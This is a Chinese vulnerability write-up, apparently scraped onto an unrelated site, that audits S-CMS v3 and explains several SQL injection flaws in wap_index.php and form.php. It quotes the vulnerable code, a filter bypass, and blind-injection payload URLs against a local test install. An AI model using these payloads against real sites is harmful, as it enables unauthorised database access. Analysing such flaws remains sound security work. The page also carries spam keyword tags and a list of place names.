濮阳杆衣贸易有限公司

主頁 > 知識庫 > 詳解S-CMS企業(yè)建站v3幾處SQL注入

詳解S-CMS企業(yè)建站v3幾處SQL注入
熱門標簽:貴陽ai外呼系統(tǒng) 電話機器人批發(fā) 重慶人工智能電銷機器人報價 智能電銷機器人廣告語 長春極信防封電銷卡公司 crm外呼系統(tǒng)好不好 愛巢地圖標注 強訊外呼系統(tǒng) 電銷外呼線路改不外呼線路

0x01 前言

有段時間沒有發(fā)文章了,主要沒挖到比較有意思的漏洞點。然后看最近爆了很多關于S-CMS的漏洞,下載了源碼簡單挖了一下然后給大家分享一下。

0x02 目錄

Wap_index.php sql注入Form.php Sql注入Input、query

0x03 插曲

這里分享一下在審計的時候自用的一段代碼。

 $debug=function(){
      $logFile='C:\\Users\\DELL\\Desktop\\debug.txt';   //輸出的文件
      $param=func_get_args();           //獲取傳入函數(shù)的參數(shù)
      if (count($param)>0){              
        $str=serialize($param);           //序列號
        if($str){                  //存在就寫入
          $str=file_get_contents($logFile)."\r\n\r\n".__FILE__.":\t\t".$str;
          file_put_contents($logFile,"\t\t".$str);
        }else{                 //不存在寫入Null
          $str=file_get_contents($logFile)."\r\n\r\n".__FILE__.":\r\n".$str;
          file_put_contents($logFile,"\t\tNull");
        }
      }
    };$debug($x,$a,$b);   //這里$x,$a,$b都是要查看的變量。

主要用這個的話個人感覺比較方便,平常測試都是var_dump();die;來查看。然后當die后,頁面還是沒有打印內(nèi)容,用這個函數(shù)還是相對比較方便的。當然用phpstorm下斷點挺好的,不過個人不太喜歡。主要還是我懶。

0x04 Wap_index.php sql注入

漏洞文件:\scms\wap_index.php這個文件的話不止這一處Sql注入,這里只寫這一個。漏洞行號:90-96

case "text":
  $debug("select * from SL_text where T_id=" . $S_id, "T_title");
  if (getrs("select * from SL_text where T_id=" . $S_id, "T_title") == "") {
    box("菜單指向的簡介已被刪除,請到“菜單管理”重新編輯", "back", "error");
  } else {
    $page_info = ReplaceLableFlag(ReplaceWapTag(CreateHTMLReplace(CreateText(ReplaceWapPart(LoadWapTemplate($style, $S_id)) , $S_id))));
  }
  break;

S_id直接從GET獲取無單引號拼接進了sql語句

if(isset($_GET["S_id"])){
  $S_id = $_GET["S_id"];
}else{
  $S_id = "0";
}

這套CMS核心全帶全都加密處理了所以我們看不到他的過濾方法,不過當出現(xiàn) union select 等的時候都直接退出了,沒有繼續(xù)往下執(zhí)行。研究發(fā)現(xiàn)當傳入select(user())能正常執(zhí)行,不過嘗試union(select(1)) 的時候也沒有執(zhí)行,應該是直接正則匹配的union這個單詞,而select匹配了前后的空格。

漏洞演示:

$debug保存下來的信息。

D:\phpStudy\PHPTutorial\WWW\scms\wap_index.php: a:2:{i:0;s:58:"select * from SL_text where T_id=1 and (select(user())!=1)";i:1;s:7:"T_title";}

Mysql.log

正常執(zhí)行了sql語句。S_id=1 and (select(user()) from sl_reply 同樣可以正常執(zhí)行,可通過盲注爆數(shù)據(jù)。

0x05 Form.php Sql注入

漏洞文件:\scms\form.php

漏洞Action:input

if($action=="input"){
  if ($_POST["code"]!=$_SESSION["CmsCode"]){
    echo "<div style='height:500px'></div>";
    box(lang("驗證碼錯誤!/l/Verification code error"),"back","error");
  }else{
    $R_time=date('Y-m-d H:i:s');
    $R_rid=gen_key(15);
    foreach ($_POST as $x=>$value) {
    if ($x>0){
      if ($_POST[$x]==""){
        box(lang("請?zhí)钊珒?nèi)容后提交!/l/Please fill in the full content to submit!"),"back","error");
        die();
      }else{
        if (!IsValidStr($_POST[$x])){
        box(lang("您輸入的內(nèi)容有敏感字符,請重新輸入!/l/The contents you have entered are sensitive characters, please re-enter!"),"back","error");
        }else{
$debug("Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(".$x.",'".htmlspecialchars($_POST[$x])."','".$R_time."','".$R_rid."',".$M_id.")");
        mysqli_query($conn,"Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(".$x.",'".htmlspecialchars($_POST[$x])."','".$R_time."','".$R_rid."',".$M_id.")");
        }
      }
    }
    }
    if ($F_cq>0){
    mysqli_query($conn,"Insert into SL_query(Q_code,Q_content,Q_sort) values('".$R_rid."','".date('Y-m-d H:i:s')."__用戶提交表單,等待處理"."',".$F_cq.")");
    box(lang("提交成功,查詢碼 ".$R_rid."/l/success!code ".$R_rid.""),$C_dir.$url_to,"success");
  }else{
  box(lang("提交成功!/l/success!code ".$R_rid.""),$C_dir.$url_to,"success");
  }
    sendmail("您的網(wǎng)站有新的表單提交","<h2>您的網(wǎng)站“".lang($C_webtitle)."”有新的表單提交</h2><hr>請進入“網(wǎng)站后臺” - “表單系統(tǒng)” - “查看統(tǒng)計”查看詳情!",$C_email);

  }
}

這里簡單看些邏輯,先判斷code驗證碼是否錯誤,如果為False不錯誤,進入foreach循環(huán),判斷$x(也就是 $_POST的key)>0這里就可以通過php弱類型比如1a>0 為True 這個不多介紹了,然后如果$_POST[$x] 不為空,繼續(xù)檢測$_POST[$x] 是否存在敏感字符,然后拼接sql語句。

整個流程就這樣了,漏洞觸發(fā)點就是$x,它檢測敏感字符只檢測了$_POST[$x]內(nèi)容,而沒檢測$x,而且直接拼接入了sql語句導致SQL注入。

漏洞演示:

http://127.0.0.1/scms/form.php?action=input&S_id=0code=ywu7&1//and//(1//like//1)=121

$debug記錄

D:\phpStudy\PHPTutorial\WWW\scms\form.php: a:1:{i:0;s:147:"Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(1//and//(1//like//1),'121','2018-12-05 15:27:00','WjWEpX8YIK6cfeq',6)";}

漏洞文件:\scms\form.php

漏洞Action:query

if ($action=="query"){
$Q_sort=$_POST["Q_sort"];
$Q_code=$_POST["Q_code"];
  if ($_POST["code"]!=$_SESSION["CmsCode"]){
    echo "<div style='height:500px'></div>";
    box(lang("驗證碼錯誤!/l/Verification code error"),"back","error");
  }else{

    $sql="select * from SL_query where Q_sort=".$Q_sort." and Q_code like '".$Q_code."'";
    $result = mysqli_query($conn, $sql);
    $row = mysqli_fetch_assoc($result);

這個相對簡單不多說,$Q_sort從post獲取,無過濾直接拼接進sql語句導致sql注入。

Payload:http://127.0.0.1/scms/form.php?action=query&S_id=0code=t5o9&Q_sort=1 and 1=1

0x06 結(jié)束語

以上就是本文的全部內(nèi)容,希望對大家的學習有所幫助,也希望大家多多支持腳本之家。

標簽:山南 內(nèi)蒙古 陜西 廣安 上海 吳忠 清遠 保定

巨人網(wǎng)絡通訊聲明:本文標題《詳解S-CMS企業(yè)建站v3幾處SQL注入》,本文關鍵詞  詳解,S-CMS,企業(yè)建站,幾處,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權(quán)與本站無關。
  • 相關文章
  • 下面列出與本文章《詳解S-CMS企業(yè)建站v3幾處SQL注入》相關的同類信息!
  • 本頁收集關于詳解S-CMS企業(yè)建站v3幾處SQL注入的相關信息資訊供網(wǎng)民參考!
    • 推薦文章
    遂昌县| 无极县| 潢川县| 揭西县| 丹江口市| 遂昌县| 巴彦县| 宜川县| 新化县| 伊金霍洛旗| 西平县| 甘孜| 绵阳市| 海淀区| 汝阳县| 阿克苏市| 金门县| 梁平县| 黄龙县| 平定县| 封丘县| 饶阳县| 平邑县| 安福县| 钟祥市| 石台县| 奈曼旗| 山西省| 柯坪县| 大英县| 法库县| 关岭| 菏泽市| 蒲城县| 全椒县| 阳原县| 靖西县| 肥乡县| 和林格尔县| 林州市| 濮阳县|